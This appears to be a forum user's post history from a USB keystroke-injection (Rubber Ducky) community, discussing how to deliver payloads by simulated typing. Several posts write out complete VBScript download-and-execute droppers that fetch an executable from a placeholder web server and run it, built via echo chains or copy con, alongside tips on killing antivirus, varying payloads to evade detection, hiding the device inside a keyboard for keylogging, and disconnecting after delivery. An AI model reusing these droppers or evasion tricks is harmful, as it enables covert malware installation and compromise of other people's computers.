Jump to content

AndrewFaulds

Active Members
  • Posts

    22
  • Joined

  • Last visited

Posts posted by AndrewFaulds

  1. I've been playing around with what could be done from the Windows Run window and have the following sample that you guys might be able to build more from.

    1. Open Run window (window-R)

    2. Create a script file (VBScript for this sample) and execute it with the following command:

    cmd /c "echo wscript.echo "hello" > c:\temp\test.vbs && start wscript c:\temp\test.vbs"

    A couple of notes about the command:

    a. cmd /c is used so that the command window will close on completion

    b. I'm using echo to build a text file in some directory (make sure it's a directory that exists and you have rw rights to!)

    c. If you want to build a script with multiple lines, you can just use another echo statement, but be sure to use >> instead of > to append to the script file you're building

    d. && is used to separate the commands

    e. I'm calling the start command instead of wscript directly so that the cmd process doesn't have to wait for the VBScript file to complete before closing the command window

    Not a perfect solution, and certainly not a sophisticated payload in this sample, but I'm sure you guys are more creative than me.

    Sergio

    TOPTIP:

    Use copy con to build scripts instead of echo:

    copy con script.vbs

    blah.blah

    blah.blah.derp

    blah[Ctrl+Z or F6]

  2. That's a great idea. The Rockbox code base is incredibly clean and well organized making it very easy to hack. And you have the added bonus that an MP3 player looks completely innocuous when plugged into a computer. "Hey I need to charge my MP3 player, can I plug it in your USB port?"

    And, disguised as a ducky, with a speaker soldered on, can play the rubber ducky song!

  3. Correction: Nobody bothers to write viruses and by the nature of it being based off of UNIX, it has very few "hacks" because of things like stack protection that help to prevent buffer overflows, etc.

    I know, I was joking.

    The USB duck hack is very unreliable on the Mac due to the fact that very little in OS X is ever in exactly the same place computer to computer (Eg. dock at the bottom but can be resized and is centre aligned so things are never in the same place except on a clean install/user.) and that you can't exactly use the menu bar to open apps, you can use spotlight but that returns different items depending what the user uses regally.

    I'm going to do my best to get around these issues and make the best payloads I can but don't expect this to even work as well as it does on Windows.

    Well, you can always use keyboard shortcuts. Although I doubt Mac OS X is very keyboard friendly.

  4. I ordered 2 of Teensys too with a friend of mine, so could split the postage :)

    That evil volcano ash seems to delay things though, dunno when it will arrive here...

    Got few ideas ready, just need the hardware to test em out. Also trying to find a place where I can order PCB for that extremely small version I posted about. No luck yet, everyplace just seems to have minimum of 1000 to order :D

    Those teensy tiny particles of silica from the volcano are stopping your Teensy.

  5. Ah yes,

    Thanks for bringing that up.

    On that note do you know if that would effect the use of it as development?

    And also would there be a way to change that?

    (remove the Arduino from the board and load a library or something)

    It makes it entirely useless.

    That's how it "would effect the use of it as development".

    As the serial converter chip, well, it appears as a serial COM port, and you need custom drivers for it.

    If this was a MIDI Ducky, it'd be handy. But not for anything we want.

    Perhaps the Arduino could do USB, with a custom USB port hooked up to the pins, but I somehow doubt if the Arduino's Serial IO mode is fast enough.

  6. then what about this?

    when a vbs script is activated the command promp is imidiatly back. it doesnt wait for it to finish so i think that the code from the fisrt post wont work propperly with bigger files.

    so why not let the VBS execute the file. its only 3 lines.

    Dim DataBin 
    Dim HTTPGET 
    Set HTTPGET = CreateObject("Microsoft.XMLHTTP") 
    HTTPGET.Open "GET", "http://www.domain.com/file.exe", False 
    HTTPGET.Send 
    DataBin = HTTPGET.ResponseBody 
    Const adTypeBinary=1 
    Const adSaveCreateOverWrite=2 
    Dim test1 
    Set test1 = CreateObject("ADODB.Stream") 
    test1.Type = adTypeBinary 
    test1.Open 
    test1.Write DataBin 
    test1.SaveToFile "file.exe", adSaveCreateOverWrite
    Set shell = CreateObject("WScript.Shell")
    shell.Run Chr(34) & "file.exe" & Chr(34), 1, false
    

    and also you can put all the echo's in 1 string. so the waiting time is less then having to wait till the promt comes back up again.

    it will look something like this:

    echo Dim DataBin>dl.vbs && echo Dim HTTPGET>>dl.vbs && echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>dl.vbs && echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs && echo HTTPGET.Send>>dl.vbs && echo DataBin = HTTPGET.ResponseBody>>dl.vbs && echo Const adTypeBinary=1 >>dl.vbs && echo Const adSaveCreateOverWrite=2 >>dl.vbs && echo Dim test1>>dl.vbs && echo Set test1 = CreateObject("ADODB.Stream")>>dl.vbs && echo test1.Type = adTypeBinary>>dl.vbs && echo test1.Open>>dl.vbs && echo test1.Write DataBin>>dl.vbs && echo test1.SaveToFile "file.exe", adSaveCreateOverWrite>>dl.vbs && echo Set shell = CreateObject("WScript.Shell")>>dl.vbs && echo shell.Run Chr(34) ^& "file.exe" ^& Chr(34), 1, false>>dl.vbs

    and then all what is left is to run it and exit CMD:

    promt> dl.vbs

    promt> exit

    i think this is the lowest time possible being at the command promt. or someone needs to find a way to srink the VB script even more! that would be awsome!

    since i didnt got selected for a dev kit i am thinking of buying my own teensy. though a q? i read that darren is useing the original one. but i checked the site and all of their stuff uses mini usb. any good/simple way for a converter (buy a self making is oke)

    cheers!

    Uh....

    You can't have multiple echo commands in a line.

    And as I stated earlier, "echo something >dl.vbs" is less efficient than just copy con.

  7. Something I'm hopefully going to test out is embedding the teensy inside an old white apple keyboard (Because it has huge amounts of space in the back for my crappy soldering.), taking out the USB controller board and running the buttons through the teensy for key logging or activating the payload when conditions are met.

    So, Apple products don't get viruses?

    It seems they get duckies.

  8. Very nice work. Just tested it out by plugging in a random USB mouse. I did run into one small bug. When the program is running, plug in a new device, hit "ctrl+alt+del" then "esc" after the menu comes up. Then unplug the device. The letter "t" on the keyboard will no longer work. Tried it three times to make sure it wasn't me.

    Other then that, great work. Will be running on my coloed server.

    Oh those weird random-letter-no-longer-works bugs... I HATE THEM

  9. 4. Killing Anti-Virus by mouse click

    This would be very simple after detecting antivirus in use. After the anti-virus is down, possibilities are endless.

    It would be more efficient to do this using keyboard presses, as you can't guarantee window position.

    Windows applications are HIGHLY keyboard accessible. Even the blind can brows animatedgifs.com!

  10. Maybe something like this would work have the duck load up cmd and type in...

    echo Dim DataBin >dl.vbs
    echo Dim HTTPGET >>dl.vbs
    echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP") >>dl.vbs
    echo HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False>>dl.vbs 
    echo HTTPGET.Send >>dl.vbs
    echo DataBin = HTTPGET.ResponseBody >>dl.vbs
    echo Const adTypeBinary=1 >>dl.vbs
    echo Const adSaveCreateOverWrite=2 >>dl.vbs
    echo Dim test1 >>dl.vbs
    echo Set test1 = CreateObject("ADODB.Stream") >>dl.vbs
    echo test1.Type = adTypeBinary >>dl.vbs
    echo test1.Open >>dl.vbs
    echo test1.Write DataBin >>dl.vbs
    echo test1.SaveToFile "file.exe", adSaveCreateOverWrite >>dl.vbs
    dl.vbs
    file.exe
    exit

    this code will make a vb script that will execute and download a file from a web server. Then you run the file. There a few Anti Virus that detect this as bad but with some changes it will run good.

    I Will be testing it here soon once my ducky gets here.

    Tell me what you guys think?

    Why the echo commands? copy con is more efficient ;)

    Just do:

    copy con dl.vbs[RETURN]
    Dim HTTPGET[RETURN]
    Set HTTPGET = CreateObject("Microsoft.XMLHTTP")[RETURN]
    HTTPGET.Open "GET", "http://YOURWEBSErVER/test.exe", False[RETURN]
    HTTPGET.Send[RETURN]
    DataBin = HTTPGET.ResponseBody[RETURN]
    Const adTypeBinary=1[RETURN]
    Const adSaveCreateOverWrite=2[RETURN]
    Dim test1[RETURN]
    Set test1 = CreateObject("ADODB.Stream")[RETURN]
    test1.Type = adTypeBinary[RETURN]
    test1.Open[RETURN]
    test1.Write DataBin[RETURN]
    test1.SaveToFile "file.exe", adSaveCreateOverWrite[CTRL+Z]
    file.exe[RETURN]
    exit[RETURN]

  11. In regards of disconnecting the ducky, great idea, good that you thought of that!

    I dont think copy con will work if the antivirus running (if not killed as discussed in another thread) has an instant scanning feature scanning contents of currently modified files..

    Seb

    Well, yes, but bear in mind most virus scanners won't know the exploit (assuming a new one), plus Ducky can create a different version every time with some crafty code.

  12. USB hub with your ducky and a flashdrive maybe?

    I'm looking for more 'creative' solutions, basically I'd like everything done as Keyboard input (if I have a choice :)

    What I've just thought of would be using "copy con" to construct a script, e.g.

    [WinKey+R]
    cmd
    [Enter]
    copy con quack.vbs[Enter]
    object = someobject[Enter]
    object.dosomething[Enter]
    end[CTRL+Z]
    quack.vbs[Enter]

    Also one more idea: Make the ducky disconnect after delivering a payload, making it harder to detect.

  13. In the USB Rubber Ducky Part 1 video, Darren says that you could potentially upload an executable payload from the HID.

    How would you do this?

    As even the smallest 10KB payload would take a long time to "type" into the PC, even automatically.

    As mentioned elsewhere in this forum, with no delay, max speed would be around 500 chr/s. Now, uploading a binary via keystrokes would be slow, as binaries would have to be simulated as Alt+XXX key combinations to make it possible to enter the full range of 8-bit values. As a result, this 500 chr/s would become around 150 chr/s with no delay. At a rate of 150 bps, a 10KB (10240B) payload would take around 70 seconds to upload. That's way over a minute, and very inefficient.

    Emulating a USB Flash Drive might work, but then the exploit could be blocked just as easily as the USB Switchblade.

    Oh and Darren, if you're reading this: 1,1 is 1 pixel away from the very top-left corner of the screen. 0,0 would be correct.

×
×
  • Create New...